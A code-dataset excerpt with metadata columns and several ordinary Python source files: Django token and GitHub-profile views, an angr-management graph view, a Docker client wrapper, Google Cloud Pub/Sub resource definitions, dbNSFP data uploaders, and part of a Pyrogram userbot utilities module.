hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a522e9a12bc7c4dbb25eb2263a0c78b7c949de6b
| 1,155
|
py
|
Python
|
noos_viewer/tokens.py
|
rbins-swap-team/NoosDrift
|
3aafa6002567f71ad42dc685fa4e5dd0b74007b2
|
[
"MIT"
] | null | null | null |
noos_viewer/tokens.py
|
rbins-swap-team/NoosDrift
|
3aafa6002567f71ad42dc685fa4e5dd0b74007b2
|
[
"MIT"
] | 12
|
2020-03-13T14:12:48.000Z
|
2022-03-12T00:13:46.000Z
|
noos_viewer/tokens.py
|
rbins-swap-team/NoosDrift
|
3aafa6002567f71ad42dc685fa4e5dd0b74007b2
|
[
"MIT"
] | null | null | null |
from noos_viewer.models import UserProfile
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.utils import six
class AccountActivationTokenGenerator(PasswordResetTokenGenerator):
# def _make_hash_value(self, profile, timestamp):
def _make_hash_value(self, user, timestamp):
profiles = UserProfile.objects.filter(user__pk=user.pk)
return (
# six.text_type(profile.user.pk) + six.text_type(timestamp) +
six.text_type(user.pk) + six.text_type(timestamp) +
six.text_type(profiles[0].email_confirmed)
# six.text_type(profile.email_confirmed)
)
# def _make_hash_value(self, user, timestamp):
# # Ensure results are consistent across DB backends
# login_timestamp = ''
# if user.last_login is None:
# else:
# user.last_login.replace(microsecond=0, tzinfo=None)
#
# return (
# six.text_type(user.pk) + user.password +
# six.text_type(login_timestamp) + six.text_type(timestamp)
# )
account_activation_token = AccountActivationTokenGenerator()
| 38.5
| 77
| 0.664935
|
adcf80492ed80c423173c12c9fac9d028fe68342
| 9,708
|
py
|
Python
|
angrmanagement/ui/views/data_dep_view.py
|
DennyDai/angr-management
|
8a4ba5dafbf2f4d2ba558528a0d1ae099a199a04
|
[
"BSD-2-Clause"
] | null | null | null |
angrmanagement/ui/views/data_dep_view.py
|
DennyDai/angr-management
|
8a4ba5dafbf2f4d2ba558528a0d1ae099a199a04
|
[
"BSD-2-Clause"
] | null | null | null |
angrmanagement/ui/views/data_dep_view.py
|
DennyDai/angr-management
|
8a4ba5dafbf2f4d2ba558528a0d1ae099a199a04
|
[
"BSD-2-Clause"
] | null | null | null |
import logging
from typing import Optional, Dict, List, TYPE_CHECKING, Set
# noinspection PyPackageRequirements
from PySide2 import QtCore, QtWidgets, QtGui
# noinspection PyPackageRequirements
from networkx import DiGraph
from angr.analyses.data_dep import MemDepNode, RegDepNode, TmpDepNode
from .view import BaseView
from ..dialogs.data_dep_graph_search import QDataDepGraphSearch
from ..widgets.qdatadep_graph import QDataDepGraph
from ..widgets.qdatadepgraph_block import QDataDepGraphBlock
if TYPE_CHECKING:
from angr.analyses.data_dep import BaseDepNode
from angr.analyses import DataDependencyGraphAnalysis
from angr import SimState
from capstone import CsInsn
_l = logging.getLogger(__name__)
class DataDepView(BaseView):
"""Workspace view used to display a data dependency graph on the screen"""
@property
def function(self):
raise NotImplementedError("Does not apply!")
FUNCTION_SPECIFIC_VIEW = False
def __init__(self, workspace, default_docking_position, *args, **kwargs):
super().__init__('data_dependency', workspace, default_docking_position, *args, **kwargs)
self.base_caption = 'Data Dependency'
self.workspace = workspace
# Get all instructions in the program
self._instructions: Dict[int, 'CsInsn'] = {}
inst = self.workspace.instance
for _, func in inst.kb.functions.items():
for block in func.blocks:
disass = block.disassembly
for ins in disass.insns:
self._instructions[ins.address] = ins
self._end_state: Optional['SimState'] = None
self._start_addr: Optional[int] = None
self._end_addr: Optional[int] = None
self._block_addrs: Optional[List[int]] = None
# UI widgets
self._graph_widget: Optional[QDataDepGraph] = None
# Data
self._data_dep: Optional['DataDependencyGraphAnalysis'] = None
self._ddg: Optional['DiGraph'] = None # Derived from analysis, can be full, simplified, or subgraph
self._graph: Optional['DiGraph'] = None
self._traced_ancestors: Set[QDataDepGraphBlock] = set()
self._traced_descendants: Set[QDataDepGraphBlock] = set()
self._init_widgets()
self._register_events()
@property
def _data_dep_graph(self) -> Optional['DiGraph']:
return self._ddg
@_data_dep_graph.setter
def _data_dep_graph(self, new_ddg: 'DiGraph'):
self._ddg = new_ddg
self._graph_widget.ref_graph = new_ddg
@property
def traced_ancestors(self) -> Set[QDataDepGraphBlock]:
return self._traced_ancestors
def update_ancestors(self, block: QDataDepGraphBlock):
self._traced_descendants.clear()
self._traced_ancestors = self._graph_widget.get_ancestors(block)
self.redraw_graph()
@property
def traced_descendants(self) -> Set[QDataDepGraphBlock]:
return self._traced_descendants
def update_descendants(self, block: QDataDepGraphBlock):
self._traced_ancestors.clear()
self._traced_descendants = self._graph_widget.get_descendants(block)
self.redraw_graph()
@property
def graph_widget(self) -> Optional['QDataDepGraph']:
return self._graph_widget
@property
def analysis_params(self) -> dict:
return {
'end_state': self._end_state,
'start_addr': self._start_addr,
'end_addr': self._end_addr,
'block_addrs': self._block_addrs
}
@analysis_params.setter
def analysis_params(self, new_params: dict):
if new_params == self.analysis_params:
# Nothing new, no need to rerun analysis
return
try:
self._end_state = new_params['end_state']
self._start_addr = new_params['start_addr']
self._end_addr = new_params['end_addr']
self._block_addrs = new_params['block_addrs']
self.run_analysis()
except OSError:
pass
# except KeyError:
# _l.error("Unable to generate data dependency graph with provided parameters!")
def run_analysis(self):
inst = self.workspace.instance
data_dep: 'DataDependencyGraphAnalysis' = inst.project.analyses.DataDep(
self._end_state,
self._start_addr,
self._end_addr,
self._block_addrs,
)
self._data_dep = data_dep
self._data_dep_graph = data_dep.graph
self.reload()
def hover_enter_block(self, block: QDataDepGraphBlock, modifiers: QtCore.Qt.KeyboardModifierMask):
# If the user is holding down 'Control' while hovering, should show descendants instead
if modifiers & QtCore.Qt.ControlModifier:
self._traced_descendants = self._graph_widget.get_descendants(block)
else:
self._traced_ancestors = self._graph_widget.get_ancestors(block)
# if self._graph_widget is not None:
# self._graph_widget.on_block_hovered(block)
self.redraw_graph()
def hover_leave_block(self):
self._traced_ancestors.clear()
self._traced_descendants.clear()
self.redraw_graph()
def on_screen_changed(self):
if self._graph_widget is not None:
self._graph_widget.refresh()
def reload(self):
if self._graph_widget is None:
return
# Re-Generate the graph
if not self._data_dep:
self._graph = None
self._graph_widget.graph = None
self._graph_widget.request_relayout()
return
self._graph = self._create_ui_graph()
self._graph_widget.graph = self._graph
def redraw_graph(self):
if self._graph_widget.graph is not None:
self._graph_widget.viewport().update()
def sizeHint(self):
return QtCore.QSize(400, 800)
def _init_widgets(self):
self._graph_widget = QDataDepGraph(self.workspace, self, self)
h_layout = QtWidgets.QHBoxLayout(self)
h_layout.addWidget(self._graph_widget)
h_layout.setContentsMargins(0, 0, 0, 0)
def _register_events(self):
self.workspace.current_screen.am_subscribe(self.on_screen_changed)
def _convert_node(self, node: 'BaseDepNode',
converted: Dict['BaseDepNode', QDataDepGraphBlock]) -> Optional[QDataDepGraphBlock]:
if isinstance(node, (MemDepNode, RegDepNode)):
cs_instr = self._instructions.get(node.ins_addr, None)
if cs_instr:
instr = cs_instr.insn
else:
instr = None
else:
instr = None
return converted.setdefault(node, QDataDepGraphBlock(False, self, node, instr))
def _create_ui_graph(self) -> DiGraph:
g = DiGraph()
converted = {}
for dep_node in self._data_dep_graph.nodes():
node = self._convert_node(dep_node, converted)
if node:
g.add_node(node)
for n0, n1 in self._data_dep_graph.edges():
n0_ = self._convert_node(n0, converted)
n1_ = self._convert_node(n1, converted)
g.add_edge(n0_, n1_)
return g
def _graph_has_tmp_nodes(self) -> bool:
"""
Returns whether or not the given graph has temp nodes
"""
if not self._data_dep_graph:
return False
return any(node for node in self._data_dep_graph.nodes if isinstance(node, TmpDepNode))
def use_subgraph(self, block: QDataDepGraphBlock, backwards: bool):
dep_node = block.node
# Determine if any temp nodes exist in the graph and, if so, include them in subgraph
self._data_dep_graph = self._data_dep.get_data_dep(dep_node, self._graph_has_tmp_nodes(), backwards)
self.reload()
def _toggle_graph(self):
"""Switches the current graph being shown between the full and simplified graph"""
if self._data_dep_graph is self._data_dep.simplified_graph:
self._data_dep_graph = self._data_dep.graph
elif self._data_dep_graph is self._data_dep.sub_graph:
self._data_dep_graph = self._data_dep.graph if self._graph_has_tmp_nodes() \
else self._data_dep.simplified_graph
else:
self._data_dep_graph = self._data_dep.simplified_graph
self.reload()
#
# Events
#
def keyPressEvent(self, event: QtGui.QKeyEvent) -> None:
"""
Allow for searching for a node
"""
key = event.key()
modifiers = event.modifiers()
if key == QtCore.Qt.Key_F and modifiers & QtCore.Qt.ControlModifier:
# User would like to search
search_dialog = QDataDepGraphSearch(self, self.graph_widget)
search_dialog.setModal(False)
search_dialog.show()
else:
super().keyPressEvent(event)
def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:
button = event.button()
if button == QtCore.Qt.RightButton and event:
options_menu = QtWidgets.QMenu("Options", self)
if self._data_dep_graph is self._data_dep.graph:
toggle_text = 'Hide temp nodes'
elif self._data_dep_graph is self._data_dep.simplified_graph:
toggle_text = 'Show temp nodes'
else:
toggle_text = 'Untrack node'
options_menu.addAction(toggle_text, self._toggle_graph)
# Open options menu
options_menu.exec_(self.mapToGlobal(event.pos()))
else:
super().mousePressEvent(event)
| 34.920863
| 108
| 0.649052
|
5d5fe2af14f2c09007f951ab42412797ce250ac1
| 3,720
|
py
|
Python
|
python/nvidia_deepops/docker/client/dockerpy.py
|
samcmill/ngc-container-replicator
|
b5502076c78bb2904f2e57681c8b5a86285b4c45
|
[
"BSD-3-Clause"
] | 20
|
2019-02-01T18:22:47.000Z
|
2022-02-09T07:35:48.000Z
|
python/nvidia_deepops/docker/client/dockerpy.py
|
samcmill/ngc-container-replicator
|
b5502076c78bb2904f2e57681c8b5a86285b4c45
|
[
"BSD-3-Clause"
] | 10
|
2019-06-03T19:25:17.000Z
|
2022-01-11T03:56:38.000Z
|
python/nvidia_deepops/docker/client/dockerpy.py
|
samcmill/ngc-container-replicator
|
b5502076c78bb2904f2e57681c8b5a86285b4c45
|
[
"BSD-3-Clause"
] | 8
|
2019-05-10T14:43:26.000Z
|
2021-06-28T20:53:19.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import docker
from nvidia_deepops import utils
from nvidia_deepops.docker.client.base import BaseClient
__all__ = ('DockerPy',)
log = utils.get_logger(__name__, level=logging.INFO)
class DockerPy(BaseClient):
def __init__(self):
self.client = docker.from_env(timeout=600)
def login(self, *, username, password, registry):
self.client.login(username=username,
password=password, registry=registry)
def get(self, *, url):
try:
return self.client.images.get(url)
except docker.errors.ImageNotFound:
return None
def pull(self, url):
log.debug("docker pull %s" % url)
self.client.images.pull(url)
def push(self, url):
log.debug("docker push %s" % url)
self.client.images.push(url)
def tag(self, src_url, dst_url):
log.debug("docker tag %s --> %s" % (src_url, dst_url))
image = self.client.images.get(src_url)
image.tag(dst_url)
def remove(self, url):
log.debug("docker rmi %s" % url)
self.client.images.remove(url)
def url2filename(self, url):
return "docker_image_{}.tar".format(url).replace("/", "%%")
def filename2url(self, filename):
return os.path.basename(filename).replace("docker_image_", "")\
.replace(".tar", "").replace("%%", "/")
def save(self, url, path=None):
filename = self.url2filename(url)
if path:
filename = os.path.join(path, filename)
log.debug("saving %s --> %s" % (url, filename))
image = self.client.api.get_image(url)
with open(filename, "wb") as tarfile:
tarfile.write(image.data)
return filename
def load(self, filename):
log.debug("loading image from %s" % filename)
with open(filename, "rb") as file:
self.client.images.load(file)
basename = os.path.basename(filename)
if basename.startswith("docker_image_"):
url = self.filename2url(filename)
log.debug("expected url from %s is %s" % (filename, url))
return url
| 36.470588
| 73
| 0.674462
|
87a99a3cde8e0dd1e46d641da481783211ec5197
| 6,076
|
py
|
Python
|
profiles/views.py
|
magbanum/octoprofile
|
07457a7273201c4009a402f6f1b818f1bb94b4e1
|
[
"MIT"
] | 8
|
2021-07-03T12:59:29.000Z
|
2022-01-20T13:51:05.000Z
|
profiles/views.py
|
magbanum/octoprofile
|
07457a7273201c4009a402f6f1b818f1bb94b4e1
|
[
"MIT"
] | null | null | null |
profiles/views.py
|
magbanum/octoprofile
|
07457a7273201c4009a402f6f1b818f1bb94b4e1
|
[
"MIT"
] | 1
|
2022-02-07T17:49:37.000Z
|
2022-02-07T17:49:37.000Z
|
from django.http.response import JsonResponse
from django.shortcuts import render
from requests.api import request
from rest_framework.views import APIView
from rest_framework.response import Response
from .forms import UsernameForm
import requests
import json
import os
def home(request):
form = UsernameForm()
return render(request, 'profiles/home.html', {'form': form})
def joined_date(date):
months = {'01': 'January', '02': 'February', '03': 'March', '04': 'April', '05': 'May', '06': 'June',
'07': 'July', '08': 'August', '09': 'Saptember', '10': 'Octomber', '11': 'November', '12': 'December'}
# print(date)
year = date[:4]
month = months[date[5:7]]
day = date[8:10]
return month+' '+day+', '+year
def get_username(request):
# if this is a POST request we need to process the form data
if request.method == 'GET':
# create a form instance and populate it with data from the request:
form = UsernameForm(request.GET)
# print(form.cleaned_data['username'])
# check whether it's valid:
if form.is_valid():
# Process the data in form.cleaned_data as required
headers = {
"Authorization": os.getenv('GITHUB_ACCESS_TOKEN')
}
# To get the User data and store in userdata
url1 = "https://api.github.com/users/{}".format(
form.cleaned_data['username'])
response = requests.get(url1, headers=headers)
userdata = response.json()
# print(userdata)
# print(userdata)
# If response contains 'message' in it then the username is invalid. Return the error message.
if 'message' in userdata.keys():
form = UsernameForm(request.GET)
note = "I can't find your Octoprofile.😟"
return render(request, 'profiles/home.html', {'form': form, 'note': note})
userdata['created_at'] = joined_date(userdata['created_at'])
# To get the Repositories data and store in repodata
url2 = "https://api.github.com/users/{}/repos".format(
form.cleaned_data['username'])
response = requests.get(url2, headers=headers)
repodata = response.json()
# To use repodata in another function
request.session['repodata'] = repodata
# Opening JSON file
data = open('./profiles/static/json/colors.json',)
# Returns JSON object as a dictionary
colors = json.load(data)
# print(colors['Python']['color'])
data.close()
return render(request, 'profiles/profile_page.html', {'userdata': userdata, 'repodata': repodata, 'colors': colors})
form = UsernameForm()
return render(request, 'profiles/home.html', {'form': form})
# If a GET (or any other method) we'll create a blank form
form = UsernameForm()
return render(request, 'profiles/home.html', {'form': form})
def get_repodata(request):
# Collect the saved data from function get_username()
repodata = request.session.get('repodata')
data = open('./profiles/static/json/colors.json')
# Load json dictionary in colors
colors = json.load(data)
data.close()
# To get Top languages by user
top_lang = {}
for item in repodata:
# print(item['name'], item['language'])
top_lang[item['language']] = top_lang.get(item['language'], 0) + 1
sorted_top_lang = list(
sorted(top_lang.items(), key=lambda item: item[1], reverse=True))
# sliced the list to get top 5 items
sorted_top_lang = dict(sorted_top_lang[0:5])
# change 'null' key to 'Others'
sorted_top_lang['Others'] = sorted_top_lang.pop(None)
# print(top_lang)
# print(sorted_top_lang)
# To get Most starred repositories
most_starred = {}
for item in repodata:
# print(item['name'], item['stargazers_count'])
most_starred[item['name']] = item['stargazers_count']
sorted_most_starred = list(
sorted(most_starred.items(), key=lambda item: item[1], reverse=True))
# sliced the list to get top 5 items
sorted_most_starred = dict(sorted_most_starred[0:5])
# print(sorted_most_starred)
# To get stars per languages
star_per_lang = {}
for item in repodata:
star_per_lang[item['language']] = star_per_lang.get(
item['language'], 0) + item['stargazers_count']
# print(star_per_lang)
# change 'null' key to 'Others'
star_per_lang['Others'] = star_per_lang.pop(None)
return sorted_top_lang, sorted_most_starred, star_per_lang, colors
# To create API endpoints for top 5 languages
class TopLanguages(APIView):
authentication_classes = []
permission_classes = []
def get(self, request):
data = get_repodata(request)[0]
colors_data = get_repodata(request)[3]
colors = [colors_data[key]["color"] for key in data.keys()]
chart_data = {
"labels": data.keys(),
"values": data.values(),
"colors": colors,
}
return Response(chart_data)
# To create API endpoints for top 5 most starred repos
class MostStarred(APIView):
authentication_classes = []
permission_classes = []
def get(self, request):
data = get_repodata(request)[1]
chart_data = {
"labels": data.keys(),
"values": data.values(),
}
return Response(chart_data)
# To create API endpoints for stars per languages
class StarsPerLanguages(APIView):
authentication_classes = []
permission_classes = []
def get(self, request):
data = get_repodata(request)[2]
colors_data = get_repodata(request)[3]
colors = [colors_data[key]["color"] for key in data.keys()]
chart_data = {
"labels": data.keys(),
"values": data.values(),
"colors": colors,
}
return Response(chart_data)
| 34.522727
| 128
| 0.612739
|
fccbefa73a76f757e43c909ac3bd97c43ede9cdf
| 2,047
|
py
|
Python
|
lib/googlecloudsdk/third_party/apis/pubsub/v1/resources.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/googlecloudsdk/third_party/apis/pubsub/v1/resources.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/third_party/apis/pubsub/v1/resources.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
2020-07-25T01:40:19.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2015 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Resource definitions for cloud platform apis."""
import enum
BASE_URL = 'https://pubsub.googleapis.com/v1/'
DOCS_URL = 'https://cloud.google.com/pubsub/docs'
class Collections(enum.Enum):
"""Collections for all supported apis."""
PROJECTS = (
'projects',
'projects/{projectsId}',
{},
['projectsId'],
True
)
PROJECTS_SCHEMAS = (
'projects.schemas',
'{+name}',
{
'':
'projects/{projectsId}/schemas/{schemasId}',
},
['name'],
True
)
PROJECTS_SNAPSHOTS = (
'projects.snapshots',
'{+snapshot}',
{
'':
'projects/{projectsId}/snapshots/{snapshotsId}',
},
['snapshot'],
True
)
PROJECTS_SUBSCRIPTIONS = (
'projects.subscriptions',
'{+subscription}',
{
'':
'projects/{projectsId}/subscriptions/{subscriptionsId}',
},
['subscription'],
True
)
PROJECTS_TOPICS = (
'projects.topics',
'{+topic}',
{
'':
'projects/{projectsId}/topics/{topicsId}',
},
['topic'],
True
)
def __init__(self, collection_name, path, flat_paths, params,
enable_uri_parsing):
self.collection_name = collection_name
self.path = path
self.flat_paths = flat_paths
self.params = params
self.enable_uri_parsing = enable_uri_parsing
| 24.963415
| 74
| 0.60723
|
b659370eb294cb3c965fe596994d80dd666be395
| 1,544
|
py
|
Python
|
src/hub/dataload/sources/dbnsfp/dbnsfp_upload.py
|
erikyao/myvariant.info
|
a4eaaca7ab6c069199f8942d5afae2dece908147
|
[
"Apache-2.0"
] | 39
|
2017-07-01T22:34:39.000Z
|
2022-03-15T22:25:59.000Z
|
src/hub/dataload/sources/dbnsfp/dbnsfp_upload.py
|
erikyao/myvariant.info
|
a4eaaca7ab6c069199f8942d5afae2dece908147
|
[
"Apache-2.0"
] | 105
|
2017-06-28T17:26:06.000Z
|
2022-03-17T17:49:53.000Z
|
src/hub/dataload/sources/dbnsfp/dbnsfp_upload.py
|
erikyao/myvariant.info
|
a4eaaca7ab6c069199f8942d5afae2dece908147
|
[
"Apache-2.0"
] | 14
|
2017-06-12T18:29:36.000Z
|
2021-03-18T15:51:27.000Z
|
import os
import glob
from .dbnsfp_mapping import mapping
from .dbnsfp_parser import load_data_file as load_common
import biothings.hub.dataload.uploader as uploader
from hub.dataload.uploader import SnpeffPostUpdateUploader
from hub.dataload.storage import MyVariantIgnoreDuplicatedStorage
SRC_META = {
"url": "https://sites.google.com/site/jpopgen/dbNSFP",
"license_url": "https://sites.google.com/site/jpopgen/dbNSFP",
"license_url_short": "http://bit.ly/2VLnQBz"
}
class DBNSFPBaseUploader(uploader.ParallelizedSourceUploader,
SnpeffPostUpdateUploader):
storage_class = MyVariantIgnoreDuplicatedStorage
GLOB_PATTERN = "dbNSFP*_variant.chr*"
@classmethod
def get_mapping(klass):
return mapping
def jobs(self):
# tuple(input_file,version), where version is either hg38 or hg19)
return map(lambda e: (e, self.__class__.__metadata__["assembly"]),
glob.glob(os.path.join(self.data_folder, self.__class__.GLOB_PATTERN)))
def load_data(self, input_file, hg):
self.logger.debug("loading file " + input_file)
return load_common(input_file, version=hg)
class DBNSFPHG38Uploader(DBNSFPBaseUploader):
name = "dbnsfp_hg38"
main_source = "dbnsfp"
__metadata__ = {
"assembly": "hg38",
"src_meta": SRC_META
}
class DBNSFPHG19Uploader(DBNSFPBaseUploader):
name = "dbnsfp_hg19"
main_source = "dbnsfp"
__metadata__ = {
"assembly": "hg19",
"src_meta": SRC_META
}
| 28.592593
| 90
| 0.698187
|
53a97d0092c399a8bd2fc40d2c55f130b7ed16d0
| 15,168
|
py
|
Python
|
tronx/helpers/utilities.py
|
JayPatel1314/Tron
|
d8f2d799eea344c0d76f0fe758ce385c7ceceea7
|
[
"MIT"
] | null | null | null |
tronx/helpers/utilities.py
|
JayPatel1314/Tron
|
d8f2d799eea344c0d76f0fe758ce385c7ceceea7
|
[
"MIT"
] | null | null | null |
tronx/helpers/utilities.py
|
JayPatel1314/Tron
|
d8f2d799eea344c0d76f0fe758ce385c7ceceea7
|
[
"MIT"
] | null | null | null |
import re
import os
import time
import html
import math
import json
import shlex
import random
import asyncio
import aiohttp
from hachoir.metadata import extractMetadata
from hachoir.parser import createParser
from PIL import Image
from typing import List
from re import escape, sub
from pyrogram.types import Message, User, InlineKeyboardButton
from pyrogram.errors import MessageNotModified, FloodWait
class Types(object):
TEXT = 1
DOCUMENT = 2
PHOTO = 3
VIDEO = 4
STICKER = 5
AUDIO = 6
VOICE = 7
VIDEO_NOTE = 8
ANIMATION = 9
ANIMATED_STICKER = 10
CONTACT = 11
class AioHttp(Types):
@staticmethod
async def get_json(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return await resp.json()
@staticmethod
async def get_text(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return await resp.text()
@staticmethod
async def get_json_from_text(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
text = await resp.text()
return json.loads(text)
@staticmethod
async def get_raw(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return await resp.read()
@staticmethod
async def get_url(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return resp.url
class Utilities(AioHttp):
def HelpDex(self, page_number, loaded_modules, prefix):
rows = 4
column = 2
help_modules = []
for mod in loaded_modules:
if not mod.startswith("_"):
help_modules.append(mod)
help_modules = sorted(help_modules)
modules = [
InlineKeyboardButton(
text="{} {}".format(
self.HelpEmoji(),
x.replace("_", " ").title(),
),
callback_data="modulelist_{}|{}".format(x, page_number),
)
for x in help_modules
]
twins = list(zip(modules[::column], modules[1::column]))
if len(modules) % column == 1:
twins.append((modules[-1],))
num_pages = math.ceil(len(twins) / rows)
mod_page = page_number % num_pages
if len(twins) > rows:
twins = twins[
mod_page * rows : rows * (mod_page + 1)
] + [
(
InlineKeyboardButton(
text="❰ Prev",
callback_data="{}_prev({})".format(
prefix, mod_page
),
),
InlineKeyboardButton(text="Back", callback_data=f"open-start-dex"),
InlineKeyboardButton(
text="Next ❱",
callback_data="{}_next({})".format(
prefix, mod_page
),
),
)
]
return twins
def GetMessageType(self, msg, include_text=True):
content = None
message_type = None
if include_text is True:
if msg.text or msg.caption:
content = None
message_type = Types.TEXT
elif msg.sticker:
content = msg.sticker.file_id
message_type = Types.STICKER
elif msg.document:
if msg.document.mime_type == "application/x-bad-tgsticker":
message_type = Types.ANIMATED_STICKER
else:
message_type = Types.DOCUMENT
content = msg.document.file_id
elif msg.photo:
content = msg.photo.file_id # last elem = best quality
message_type = Types.PHOTO
elif msg.audio:
content = msg.audio.file_id
message_type = Types.AUDIO
elif msg.voice:
content = msg.voice.file_id
message_type = Types.VOICE
elif msg.video:
content = msg.video.file_id
message_type = Types.VIDEO
elif msg.video_note:
content = msg.video_note.file_id
message_type = Types.VIDEO_NOTE
elif msg.animation:
content = msg.animation.file_id
message_type = Types.ANIMATION
return content, message_type
def GetNoteType(self, msg):
reply = msg.reply_to_message
note_name = None
message_type = None
content = None
text = None
file_id = None
if self.long(msg) <= 1:
return None, None, None, None, None
if msg.text:
raw_text = msg.text.markdown
else:
raw_text = msg.caption.markdown
note_name = raw_text.split()[1]
# determine what the contents of the filter are - text, image, sticker, etc
if self.long(msg) >= 3:
text = raw_text.split(None, 2)[2]
message_type = Types.TEXT
elif reply:
if reply.text:
text = reply.text.markdown if reply.text else reply.caption.markdown if reply.caption else ""
message_type = Types.TEXT
content, message_type = self.GetMessageType(reply, include_text=False)
else:
return
return note_name, text, message_type, content
def FetchNoteType(self, msg):
message_type = None
content = None
note_name = None
text = None
if msg:
if msg.text:
text = msg.text.markdown if msg.text else msg.caption.markdown if msg.caption else ""
message_type = Types.TEXT
content, message_type = self.GetMessageType(msg, include_text=False)
return note_name, text, message_type, content
async def IsAdmin(self, m: Message):
"""Check if we are an admin."""
if not m.from_user:
print(m) # getting from user as nonetype
return False
ranks = ["administrator", "creator"]
data = await self.get_chat_member(
chat_id=m.chat.id,
user_id=m.from_user.id
)
return False if not data.status in ranks else True
async def IsReply(self, msg: Message):
"""Check if the message is a reply to another user."""
return True if msg.reply_to_message is True else False
def ClearString(self, msg: str):
msg = re.sub(r"\<code\>(.*)\<\/code\>", "\g<1>", msg)
msg = re.sub(r"\<i\>(.*)\<\/i\>", "\g<1>", msg)
msg = re.sub(r"\<b\>(.*)\<\/b\>", "\g<1>", msg)
msg = re.sub(r"\<u\>(.*)\<\/u\>", "\g<1>", msg)
msg = re.sub(r"\*\*(.*)\*\*", "\g<1>", msg)
msg = re.sub(r"\_\_(.*)\_\_", "\g<1>", msg)
msg = re.sub(r"\`(.*)\`", "\g<1>", msg)
return msg
def QuoteHtml(self, text: str) -> str:
"""
Escape unexpected HTML characters.
:param text: Original text
:return:
"""
return html.escape(text, quote=False)
def TimeFormator(self, milliseconds: int) -> str:
""" converts seconds into human readable format """
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + "d, ") if days else "")
+ ((str(hours) + "h, ") if hours else "")
+ ((str(minutes) + "m, ") if minutes else "")
+ ((str(seconds) + "s, ") if seconds else "")
+ ((str(milliseconds) + "ms, ") if milliseconds else "")
)
return tmp[:-2]
def HumanBytes(self, size: int) -> str:
""" converts bytes into human readable format """
# https://stackoverflow.com/a/49361727/4723940
# 2**10 = 1024
if not size:
return ""
power = 2 ** 10
number = 0
